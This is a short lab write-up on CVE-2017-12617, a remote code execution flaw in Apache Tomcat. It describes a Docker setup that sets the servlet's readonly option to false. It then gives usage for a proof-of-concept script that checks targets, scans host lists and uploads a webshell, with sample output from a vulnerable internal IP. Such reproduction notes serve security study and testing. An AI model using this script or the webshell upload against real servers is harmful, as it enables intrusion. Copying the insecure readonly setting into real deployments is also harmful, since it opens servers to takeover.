CVE-2017-12617
The Apache Tomcat team announced on October 3 that, if the default servlet is configured, all Tomcat versions prior to 9.0.1 (Beta), 8.5.23, 8.0.47 and 7.0.82 contain a potentially dangerous remote code execution (RCE) vulnerability on all operating systems, CVE-2017-12617: remote code execution vulnerability.
Environment
The image tomcat:7.0.79-jre8 is used to reproduce the vulnerability:
docker-compose up -d
Modify the .\conf\web.xml configuration file to add the readonly setting with the value false, and be sure to restart the Tomcat service.
So that the change does not have to be re-applied every time, persist it with a mount: put the modified web.xml in the ./ directory and mount it to the specified directory in the container.
volumes:
  - ./web.xml:/usr/local/tomcat/conf/web.xml
POC
./cve-2017-12617.py [options]
options
-u, --url [::] check target URL if it's vulnerable
-p, --pwn [::] generate webshell and upload it
-l, --list [::] hosts list
[+]usage:
./cve-2017-12617.py -u http://127.0.0.1
./cve-2017-12617.py --url http://127.0.0.1
./cve-2017-12617.py -u http://127.0.0.1 -p pwn
./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn
./cve-2017-12617.py -l hotsts.txt
./cve-2017-12617.py --list hosts.txt
python tomcat-cve-2017-12617.py -u http://10.160.11.191:8080
[@intx0x80]
Poc Filename poc.jsp
File Created.
http://10.160.11.191:8080 it's vulnerable to cve-2017-12617
http://10.160.11.191:8080/Poc.jsp
Reference
*http://www.freebuf.com/vuls/150203.html